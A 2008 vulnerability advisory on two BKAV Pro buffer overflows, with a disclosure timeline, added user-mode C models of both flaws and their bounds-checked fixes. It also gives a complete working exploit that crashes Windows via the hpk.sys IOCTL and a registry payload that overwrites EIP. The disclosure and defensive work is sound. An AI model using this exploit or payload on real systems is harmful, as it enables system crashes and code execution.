BLUE MOON SECURITY ADVISORY 2008-06

Title: Multiple buffer overflows in BKAV Pro
Severity: Critical
Reporter: Blue Moon Consulting
Products: BKAV 2006 Pro build 16xx
Fixed in: --

Description

BKAV Pro contains a buffer overflow in its hpk.sys kernel driver. The vulnerability allows a regular, unprivileged user to crash Windows (blue screen of death).

The hpk.sys driver uses a 512-byte buffer. When asked to via an IOCTL, it copies the ID of every running process (4 bytes each) into this buffer without checking the number of processes against the buffer size. With more than 128 processes the copy runs past the end of the buffer, causing a kernel access violation that crashes Windows. Since the request is made from user mode, any account that can open the device can trigger the crash simply by keeping enough processes alive when the IOCTL is sent.
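The following is an added example, not code from BKAV or from the advisory: a user-mode model of the hpk.sys IOCTL path just described. It reproduces the overrun against a guard word that stands in for whatever follows the driver's buffer in kernel memory, and shows the bounds check a correct handler performs before copying. The region layout, the status names and values, and the helper names are assumptions made for illustration.

```c
/*
 * Added example (not BKAV code): model of an IOCTL handler that copies one
 * 4-byte PID per process into a 512-byte buffer, with and without the check.
 * Region layout, status values and helper names are assumptions.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HPK_BUFFER_BYTES 512                     /* driver buffer size, per the advisory */
#define HPK_MAX_PIDS     (HPK_BUFFER_BYTES / 4)  /* 128 PIDs fit; the 129th overruns */
#define GUARD_VALUE      0xDEADBEEFu

/* Results modelled loosely on NTSTATUS (assumed names and values). */
enum hpk_status { HPK_SUCCESS = 0, HPK_BUFFER_TOO_SMALL = 1 };

/* The 512-byte buffer plus the word that happens to follow it in memory. */
struct hpk_region {
    uint32_t pids[HPK_MAX_PIDS];
    uint32_t guard;
};

/* Constructed PID list (1000, 1004, 1008, ...) standing in for real PIDs. */
static void make_pids(uint32_t *pids, size_t count)
{
    for (size_t i = 0; i < count; i++)
        pids[i] = 1000u + 4u * (uint32_t)i;
}

/* Vulnerable pattern: every PID is copied, whatever the buffer can hold. */
static void hpk_fill_unchecked(unsigned char *dst, const uint32_t *pids, size_t count)
{
    memcpy(dst, pids, count * sizeof(uint32_t));
}

/* Hardened pattern: compare the count against what the output buffer holds
 * (dividing rather than multiplying, so the size arithmetic cannot wrap),
 * report the required size, and copy only when everything fits. */
static enum hpk_status hpk_fill_checked(void *out, size_t out_len,
                                        const uint32_t *pids, size_t count,
                                        size_t *bytes_returned, size_t *bytes_required)
{
    *bytes_returned = 0;
    *bytes_required = count * sizeof(uint32_t);
    if (count > out_len / sizeof(uint32_t))
        return HPK_BUFFER_TOO_SMALL;
    memcpy(out, pids, *bytes_required);
    *bytes_returned = *bytes_required;
    return HPK_SUCCESS;
}

/* Runs the unchecked copy for `count` processes into a zeroed region and
 * returns 1 if the guard word past the 512-byte buffer was overwritten.
 * The overrun is capped at the guard word so the model stays inside its own
 * object instead of faulting the way the driver faults the kernel. */
static int unchecked_overrun_hits_guard(size_t count)
{
    struct hpk_region region;
    uint32_t pids[HPK_MAX_PIDS + 1];

    if (count > HPK_MAX_PIDS + 1)
        count = HPK_MAX_PIDS + 1;
    make_pids(pids, count);
    memset(&region, 0, sizeof region);
    region.guard = GUARD_VALUE;
    hpk_fill_unchecked((unsigned char *)&region, pids, count);
    return region.guard != GUARD_VALUE;
}

/* Same request against the checked handler: status for `count` PIDs and a
 * 512-byte output buffer, storing the number of bytes actually written. */
static enum hpk_status checked_query(size_t count, size_t *bytes_returned)
{
    uint32_t out[HPK_MAX_PIDS];   /* the 512-byte driver buffer */
    uint32_t pids[1024];
    size_t required;

    if (count > 1024)
        count = 1024;
    make_pids(pids, count);
    return hpk_fill_checked(out, sizeof out, pids, count, bytes_returned, &required);
}

static enum hpk_status checked_status_for(size_t count)
{
    size_t n;
    return checked_query(count, &n);
}

static size_t checked_bytes_for(size_t count)
{
    size_t n;
    (void)checked_query(count, &n);
    return n;
}

int main(void)
{
    size_t n;
    enum hpk_status st;

    printf("128 PIDs, unchecked: guard %s\n", unchecked_overrun_hits_guard(128) ? "clobbered" : "intact");
    printf("129 PIDs, unchecked: guard %s\n", unchecked_overrun_hits_guard(129) ? "clobbered" : "intact");
    st = checked_query(129, &n);
    printf("129 PIDs, checked: status %d, %zu bytes copied\n", (int)st, n);
    return 0;
}
```

The checked variant mirrors what a Windows driver should do with the IOCTL's output buffer length: compare the request against the caller's buffer first, and fail with the required size instead of writing past the end. Note the comparison divides the buffer length by the element size rather than multiplying the count, so a huge count cannot wrap the size computation into a small number that passes the check.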

The vulnerability exists in BKAV Pro edition build 16xx and probably in older builds too.

BKAV Pro also contains a buffer overflow in its auto-update module, blupro.dll. The overflow allows an attacker to run arbitrary code.

The blupro.dll module first tests whether it can connect to www.bkav.com.vn. If it cannot, and the fSuDungProxy registry flag is set, it tries to connect through the configured proxy. In doing so it copies the szProxyAddress registry value (which can be up to 1024 bytes long) into a 100-byte local buffer with no length check, overflowing the stack. The overflow lets an attacker overwrite control data on the stack and so point EIP at an arbitrary address, giving arbitrary code execution. The values involved live under HKEY_LOCAL_MACHINE\SOFTWARE\Bkav (see the exploit below), so planting them requires write access to that key, which a standard user account does not have by default; the planted code then runs with the privileges of the BKAV process that performs the update check.
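The following is an added example, not code from BKAV or from the advisory: a user-mode model of the proxy-address copy described above. A value shaped like the published .reg fragment (100 bytes of 0x11 filler, then 4 bytes that land on control data) overwrites what follows the 100-byte buffer, while the hardened copy checks the registry data's length against the destination and also copes with REG_SZ data that arrives without a NUL terminator, which the registry does not guarantee. The frame layout, the marker values and the helper names are assumptions made for illustration.

```c
/*
 * Added example (not BKAV code): model of copying a registry string into a
 * 100-byte local buffer, unchecked beside checked. Layout/markers assumed.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PROXY_LOCAL_BYTES 100           /* local buffer size, per the advisory */
#define PROXY_VALUE_MAX   1024          /* longest szProxyAddress the advisory mentions */
#define RET_MARKER        0x41414141u   /* stand-in for the address the exploit writes */
#define UNTOUCHED         0xC0DEC0DEu   /* sentinel for control data left intact */

/* The 100-byte local buffer followed by the control word the overflow reaches. */
struct frame_model {
    char     proxy[PROXY_LOCAL_BYTES];
    uint32_t control;
};

/* Constructed REG_SZ data in the shape of the .reg fragment: 100 bytes of
 * 0x11, then RET_MARKER, and no terminator. Returns the length in bytes. */
static size_t make_payload(unsigned char *out, size_t out_len)
{
    uint32_t marker = RET_MARKER;
    size_t len = PROXY_LOCAL_BYTES + sizeof marker;
    if (out_len < len)
        return 0;
    memset(out, 0x11, PROXY_LOCAL_BYTES);
    memcpy(out + PROXY_LOCAL_BYTES, &marker, sizeof marker);
    return len;
}

/* Vulnerable pattern: the whole registry value is copied into the local buffer. */
static void copy_proxy_unchecked(unsigned char *dst, const unsigned char *data, size_t cb)
{
    memcpy(dst, data, cb);   /* cb comes from the registry; dst holds 100 bytes */
}

/* Hardened pattern: measure the string within cb (stopping at a NUL if one is
 * present), refuse a value that does not fit with its terminator rather than
 * silently truncating a proxy host, and always terminate the result. */
static int copy_proxy_checked(char *dst, size_t dst_len, const unsigned char *data, size_t cb)
{
    const unsigned char *nul = memchr(data, '\0', cb);
    size_t len = nul ? (size_t)(nul - data) : cb;
    if (dst_len == 0 || len >= dst_len)
        return -1;
    memcpy(dst, data, len);
    dst[len] = '\0';
    return 0;
}

/* Unchecked copy of the constructed payload into the modelled frame; returns
 * the control word afterwards (RET_MARKER if the payload reached it). The
 * payload is sized to the model so the overrun is observable, not fatal. */
static uint32_t unchecked_copy_control_word(void)
{
    struct frame_model frame;
    unsigned char payload[PROXY_VALUE_MAX];
    size_t cb = make_payload(payload, sizeof payload);
    memset(&frame, 0, sizeof frame);
    frame.control = UNTOUCHED;
    if (cb > sizeof frame)
        cb = sizeof frame;
    copy_proxy_unchecked((unsigned char *)&frame, payload, cb);
    return frame.control;
}

/* Checked copy of the same payload: 1 if rejected with the control word intact. */
static int checked_copy_rejects_payload(void)
{
    struct frame_model frame;
    unsigned char payload[PROXY_VALUE_MAX];
    size_t cb = make_payload(payload, sizeof payload);
    memset(&frame, 0, sizeof frame);
    frame.control = UNTOUCHED;
    return copy_proxy_checked(frame.proxy, sizeof frame.proxy, payload, cb) == -1
        && frame.control == UNTOUCHED;
}

/* Checked copy of an ordinary host passed without its terminator (as REG_SZ
 * data may be); returns 1 if it was stored intact. */
static int checked_copy_roundtrip(const char *host)
{
    struct frame_model frame;
    memset(&frame, 0, sizeof frame);
    frame.control = UNTOUCHED;
    if (copy_proxy_checked(frame.proxy, sizeof frame.proxy,
                           (const unsigned char *)host, strlen(host)) != 0)
        return 0;
    return strcmp(frame.proxy, host) == 0 && frame.control == UNTOUCHED;
}

/* Roundtrip of a host made of `len` 'a' characters: 99 fits, 100 does not. */
static int checked_copy_fits(size_t len)
{
    char host[PROXY_VALUE_MAX + 1];
    if (len > PROXY_VALUE_MAX)
        return 0;
    memset(host, 'a', len);
    host[len] = '\0';
    return checked_copy_roundtrip(host);
}

int main(void)
{
    printf("unchecked copy: control word = 0x%08x\n", (unsigned)unchecked_copy_control_word());
    printf("checked copy rejects payload: %d, stores 99-char host: %d, 100-char host: %d\n",
           checked_copy_rejects_payload(), checked_copy_fits(99), checked_copy_fits(100));
    return 0;
}
```

In real code the length comes from the cbData that RegQueryValueEx returns; the point of the checked variant is that cbData, not the destination size, decides whether the copy may proceed, and that a REG_SZ value must be treated as possibly unterminated data rather than handed to strcpy.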

It has not been verified if other editions (Home, Enterprise, Gateway) are also vulnerable.

Workaround

For both vulnerabilities, run BKAV with Administrator privileges only when really necessary; otherwise always run it under a normal user account. Note that advanced features such as the hidden process killer and the rootkit destroyer are not available under normal user privileges, and auto-update will not use a proxy.

Fix

There is no fix at the moment. Customers are advised to contact the vendor directly for a proper fix. Customers are also advised to thoroughly audit and test the Home, Enterprise and Gateway editions of the same software before deployment.

Disclosure

Blue Moon Consulting follows RFPolicy v2.0 when notifying vendors.

Initial vendor contact:

May 28, 2008: Initial contact sent to bkav@bkav.com.vn

Vendor response:

May 29, 2008: Further communication requested to be sent to Nguyen Minh Duc

Further communication:

May 29, 2008: Technical details provided to Nguyen Minh Duc

May 30, 2008: Reported bugs considered not exploitable by Nguyen Minh Duc

May 30, 2008: PoC sent to Nguyen Minh Duc

June 03, 2008: Bugs rejected by Nguyen Minh Duc

Public disclosure:

June 03, 2008

Exploit code:

Exploit for the first overflow written by Nam T. Nguyen.

/**
 * BKAV Hidden Process Killer Killer (hpk-killer)
 * Copyright 2008 Blue Moon Consulting
 *
 * Spawns enough copies of itself to push the system past 128 processes, then
 * sends hpk.sys the IOCTL that copies every PID into its 512-byte buffer.
 * Build with a Windows C toolchain (MinGW or MSVC); runs as a normal user.
 */
#include <stdlib.h>
#include <stdio.h>
#include <process.h>
#include <windows.h>

#define HPK_DEVICE_NAME           "\\\\.\\hpk"
#define IOCTL_HPK_QUERY_PROCESSES 0x80106004
#define PROCESS_ID_ARRAY_SIZE     0x200   /* 512 bytes: the size of the driver's buffer */

static void QueryProcesses(void)
{
    HANDLE hFile;
    DWORD dwReturn;
    DWORD buffer[PROCESS_ID_ARRAY_SIZE];  /* user-mode output buffer, larger than needed */

    /* Open the hpk device: read access, shared read, must already exist. */
    hFile = CreateFile(HPK_DEVICE_NAME, FILE_READ_DATA, FILE_SHARE_READ, NULL,
                       OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile != INVALID_HANDLE_VALUE)
    {
        printf("Querying processes\n");
        /* The driver copies 4 bytes per running process into its 512-byte
         * buffer without checking the count; with more than 128 processes
         * alive this request crashes the kernel. */
        DeviceIoControl(hFile, IOCTL_HPK_QUERY_PROCESSES, NULL, 0,
                        buffer, PROCESS_ID_ARRAY_SIZE, &dwReturn, NULL);
        CloseHandle(hFile);
    }
    else
    {
        printf("Cannot open %s (error %lu)\n", HPK_DEVICE_NAME, GetLastError());
    }
}

int main(int argc, char **argv)
{
    int i, count;

    if (argc < 2)
    {
        /* The detached copies spawned below run with no argument, land here,
         * and stay alive for 60 seconds so the process count stays high. */
        printf("Usage: %s <number_of_processes>\n", argv[0]);
        Sleep(60 * 1000);
    }
    else
    {
        count = atoi(argv[1]);
        printf("Spawning %d processes...\n", count);
        for (i = 0; i < count; i++)
        {
            /* Detached copy of this program, started without arguments. */
            _spawnl(_P_DETACH, argv[0], argv[0], NULL);
        }
        printf("Killing hpk...\n");
        QueryProcesses();
    }
    return 0;
}

Exploit for the second overflow written by Hieu N. Le. The registry values below enable the update check and proxy use, and set szProxyAddress to 100 bytes of 0x11 filler (written as hex digits) followed by the four bytes that replace EIP; the value is shown schematically rather than as an importable .reg entry.

[HKEY_LOCAL_MACHINE\SOFTWARE\Bkav]
"fTuDongKiemTraPhienBanMoi"=dword:00000001
"fSuDungProxy"=dword:00000001
"nProxyPort"=dword:00001f90
"szProxyAddress"=binary:1111<repeat 11 96 times>1111<EIP>

Disclaimer

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.